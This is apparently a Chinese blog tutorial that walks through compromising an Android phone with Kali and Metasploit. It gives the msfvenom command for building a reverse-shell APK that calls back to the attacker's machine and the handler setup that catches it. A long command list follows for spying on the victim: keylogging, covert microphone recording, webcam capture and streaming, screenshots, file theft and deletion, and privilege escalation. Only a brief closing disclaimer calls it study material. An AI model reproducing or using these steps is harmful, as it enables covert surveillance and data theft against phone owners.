这期是kali使用MSF进行安卓渗透的保姆级别教程，话不多说，直接开始。

准备材料：

1.装有kali的实体机或虚拟机（这里用实体机进行演示）

2.一台安卓10.0以下的手机

打开kali，先用ifconfig查看自己的kali IP地址：

kali查看IP 

图中，wlan0上的192.168.2.247就是我的IP地址，记住你自己的。

然后，我们打开kali已root的终端，在上面输入以下代码，生成安装包，注意端口一定是没有用的，IP为你自己kali的IP地址：

msfvenom -p android/meterpreter/reverse_tcp LHOST=你的kali ip lport=没有占用的端口 R >自定义名称.apk

 eg:

​
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.247 lport=30094 R >and.apk​

生成后效果如图 ：

现在准备工作做完了，我们下一步运行msfconsole

在root终端输入msfconsole运行，程序加载完后就会出现msf6 >（不好意思，忘了截图了）,这时我们输入以下代码选择程序：

use exploit/multi/handler

如图：

  

然后我们输入以下代码选择攻击模块：

set payload android/meterpreter/reverse_tcp

如图：

 

下面设置本地ip：

set LHOST 本地ip

ip设置 

设置端口：

set lport 你选择的端口

 敲黑板：上面的ip和端口早在建立安装包就设置好了，不知道的去看第二步！

我们键入

show options

 来查看配置情况：

 

万事俱备，我们输入run来启动程序，输入完成后在手机上点击刚才我们装好的应用，注意，点开应用后不会有任何反应，但应用已经进入后台运行，不必重复打开！

注意这一步最关键，主机和手机必须在同一局域网下，连接成功后如图：连接成功如图 

有很多人在这一步失败了，要么没反应，要么代码乱窜个不停，那就是网络或手机的问题。

现在我们输入一个指令，让手机打开一个应用：

app_run 应用名称

应用名称就是上面com.开头的那个，不是汉语拼音！

视频效果：

 

还可以使用：

webcam_snap

 命令拍照。

还可以使用

play wav路径

命令播放wav音频。

视频效果：

更多命令输入help查看。

---

cmd指令:

cat 读取文件内容到屏幕

cd 更改目录

checksum 检索文件的校验和

cp 将源复制到目标

del 删除指定文件

dir 列出文件（ls 的别名）

下载 下载文件或目录

编辑 编辑文件

getlwd 打印本地工作目录

getwd 打印工作目录

lcd 更改本地工作目录

lls 列出本地文件

lpwd 打印本地工作目录

ls 列出文件

mkdir 创建目录

mv 将源移动到目标

pwd 打印工作目录

rm 删除指定文件

rmdir 删除目录

search 搜索文件

show_mount 列出所有挂载点/逻辑驱动器

upload 上传文件或目录

pkill 按名称终止进程

meterpreter命令：

keyscan_start 开始捕获击键（开始键盘记录）

keyscan_dump 转储按键缓冲（下载键盘记录）

keyscan_stop 停止捕获击键（停止键盘记录）

record_mic X秒从默认的麦克风record_mic音频记录（音频录制）

webcam_chat 开始视频聊天（视频，对方会有弹窗）

webcam_list 单摄像头（查看摄像头列表）

webcam_snap 采取快照从指定的摄像头（摄像头拍摄一张照片）

webcam_stream 播放视频流从指定的摄像头（开启摄像头监控）

enumdesktops 列出所有可访问的桌面和窗口站（窗体列表）

getdesktop 得到当前的Meterpreter桌面

reboot 重新启动远程计算机

shutdown 关闭远程计算机

shell 放入系统命令 shell

enumdesktops 列出所有可访问的桌面和窗口站

getdesktop 获取当前的meterpreter桌面

idletime 返回远程用户空闲的秒数

keyboard_send 发送击键

keyevent 发送按键事件

keyscan_dump 转储击键缓冲区

keyscan_start 开始捕获击键

keyscan_stop 停止捕获击键

mouse 发送鼠标事件

screenshare 实时观看远程用户桌面

screenshot 抓取交互式桌面的屏幕截图

setdesktop 更改 Meterpreters 当前桌面

uictl 控制一些用户界面组件

record_mic 从默认麦克风录制音频 X 秒

webcam_chat 开始视频聊天

webcam_list 列出网络摄像头

webcam_snap 从指定的网络摄像头拍摄快照

webcam_stream 播放来自指定网络摄像头的视频流

play 在目标系统上播放波形音频文件 (.wav)

getsystem 尝试将您的权限提升到本地系统的权限

execute -f notepad 打开记事本

 温馨提示：

遵纪守法，如出现各种法律问题与作者无关，技术没有好坏，关键是看你怎么使用，本文章仅供学习与交流使用，转载须标明出处，如有不足请大佬指出，感谢观看！